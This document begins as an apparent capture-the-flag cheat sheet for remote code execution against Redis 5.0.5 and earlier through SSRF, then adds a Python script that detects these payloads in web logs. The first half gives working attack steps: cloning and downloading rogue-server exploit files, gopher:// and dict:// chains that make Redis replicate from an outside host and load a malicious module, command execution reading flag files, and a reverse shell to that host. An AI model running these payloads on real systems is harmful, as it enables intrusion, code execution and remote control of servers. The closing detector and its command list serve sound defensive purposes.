Redis (<=5.0.5) RCE

Download the attack files

git clone https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server.git
wget https://github.com/n0b0dyCN/redis-rogue-server/raw/refs/heads/master/exp.so
Copy exp.so into the cloned repository's folder

Start the rogue server

python3 redis_rogue_server.py -v -path exp.so -lport 1028

Attack redis

gopher

The password is known to be 123456
(Optional) turn off read-only mode on the replica (replica-read-only)
gopher://127.0.0.1:6379/_auth%2520123456%250d%250aconfig%2520set%2520replica-read-only%2520no%250d%250aquit
Set dir
gopher://127.0.0.1:6379/_auth%2520123456%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit
Set up the master/slave relationship
gopher://127.0.0.1:6379/_auth%2520123456%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%25208.155.17.250%25201028%250d%250aquit
Load the exp module
gopher://127.0.0.1:6379/_auth%2520123456%250d%250amodule%2520load%2520/tmp/exp.so%250d%250aquit
Stop master/slave synchronization
gopher://127.0.0.1:6379/_auth%2520123456%250d%250aslaveof%2520NO%2520ONE%250d%250aquit
Restore the database filename
gopher://127.0.0.1:6379/_auth%2520123456%250d%250aconfig%2520set%2520dbfilename%2520dump.rdb%250d%250aquit
Execute a system command
gopher://127.0.0.1:6379/_auth%2520123456%250d%250asystem.exec%2520%2522cat%2520%252Fflag%2522%250d%250aquit
Reverse shell
gopher://127.0.0.1:6379/_auth%2520123456%250d%250asystem.rev%25208.155.17.250%25201234%250d%250aquit

dict

dict://127.0.0.1:6379/config:set:replica-read-only:no

dict://127.0.0.1:6379/flushall
dict://127.0.0.1:6379/slaveof:8.155.17.250:1028
dict://127.0.0.1:6379/config:set:dbfilename:exp.so
dict://127.0.0.1:6379/config:set:dir:/tmp/
dict://127.0.0.1:6379/module:load:/tmp/exp.so
dict://127.0.0.1:6379/slaveof:no:one
dict://127.0.0.1:6379/config:set:dbfilename:dump.rdb
dict://127.0.0.1:6379/system.exec:"ls /"
dict://127.0.0.1:6379/system.exec:"cat /flllaaaggggg"
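From the defender's side, both the gopher:// and the dict:// chains above leave a trace in the web server's access log of the SSRF-vulnerable application, but only if the analyst decodes them the way curl eventually does: the gopher payloads carry two layers of URL encoding (%250d%250a is CRLF encoded twice, %2520 is a double-encoded space), and the dict:// form turns every ':' in the path into a space before it reaches Redis. The script below is an added example written for this page, not code from the page or from the Awsome-Redis-Rogue-Server project. It assumes the vulnerable application receives its fetch target in a query parameter named `url` (a hypothetical name) and runs over a handful of constructed combined-log-format lines; it peels encoding layers until the text is stable, splits the result into Redis command lines, and flags the ones that reconfigure the instance, pull in a foreign master or invoke the rogue module's commands.

```python
"""Spot Redis-targeting SSRF payloads (gopher:// and dict://) in web access logs.

Added example for this page. Assumes the vulnerable application takes its fetch
target in a query parameter called `url` (hypothetical parameter name).
"""
from __future__ import annotations

import re
from urllib.parse import parse_qs, unquote, urlparse

# Redis commands whose presence inside a fetched URL signals an attempt to
# reconfigure the instance, replicate from a foreign master or run code.
DANGEROUS = {
    "config": "reconfiguration (dir / dbfilename / replica-read-only)",
    "slaveof": "replication from an attacker-controlled master",
    "replicaof": "replication from an attacker-controlled master",
    "module": "loading a shared object into redis-server",
    "flushall": "wiping the keyspace",
    "system.exec": "command execution through a rogue module",
    "system.rev": "reverse shell through a rogue module",
}

# Combined log format: client, identity, user, [timestamp], "METHOD target HTTP/x".
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def normalize(value: str, max_rounds: int = 4) -> str:
    """Strip nested URL encoding (%25250d -> %250d -> %0d -> CR) until stable."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def redis_commands(url: str) -> list[str]:
    """Return the Redis command lines a gopher:// or dict:// URL would deliver."""
    parsed = urlparse(url)  # parse first: urlparse discards raw CR/LF characters
    path = parsed.path.lstrip("/")
    if parsed.scheme == "gopher":
        # gopher://host:port/_<selector>: one gopher type character, then raw
        # bytes that hit the socket verbatim once the encoding layers are gone.
        payload = normalize(path[1:])
        return [line for line in re.split(r"\r?\n", payload) if line]
    if parsed.scheme == "dict":
        # curl sends the dict path with every ':' replaced by a space, so
        # cmd:arg1:arg2 arrives at Redis as a single command line.
        payload = normalize(path)
        return [payload.replace(":", " ")] if payload else []
    return []


def flag_dangerous(commands: list[str]) -> list[tuple[str, str]]:
    """Pair each dangerous command with the reason it matters."""
    hits = []
    for cmd in commands:
        name = cmd.split(" ", 1)[0].lower()
        if name in DANGEROUS:
            hits.append((name, DANGEROUS[name]))
    return hits


def scan_log(lines: list[str]) -> list[dict]:
    """One finding per log line whose `url` parameter carries dangerous Redis commands."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs removes the outer encoding layer the HTTP client applied.
        fetched = parse_qs(urlparse(target).query).get("url", [""])[0]
        commands = redis_commands(fetched)
        hits = flag_dangerous(commands)
        if hits:
            findings.append({
                "client": client,
                "redis": urlparse(fetched).netloc,
                "commands": commands,
                "hits": hits,
            })
    return findings


# Constructed sample lines (not real traffic). The first three carry payloads
# shaped like the ones on this page; the second also has the extra encoding
# layer a browser or client adds when it submits the URL as a parameter.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /fetch?url=gopher://127.0.0.1:6379/_auth%2520123456%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit HTTP/1.1" 200 12',
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /fetch?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_auth%252520123456%25250d%25250amodule%252520load%252520%2Ftmp%2Fexp.so%25250d%25250aquit HTTP/1.1" 200 12',
    '10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /fetch?url=dict://127.0.0.1:6379/config:set:dbfilename:exp.so HTTP/1.1" 200 12',
    '10.0.0.9 - - [01/Jan/2024:12:00:03 +0000] "GET /fetch?url=https://example.com/feed.xml HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} -> {f['redis']}: {f['commands']}")
        for name, why in f["hits"]:
            print(f"    {name}: {why}")
```

The repeated decoding is deliberate: a filter that unquotes once sees `%0d%0a` and never a CRLF, which is exactly why the payloads on this page are encoded twice. The same loop is what a WAF or SSRF allow-list should apply before deciding whether an outbound fetch target is harmless, and the scheme check (`gopher`, `dict`) is a cheap first signal on its own, since a legitimate web application almost never needs either protocol.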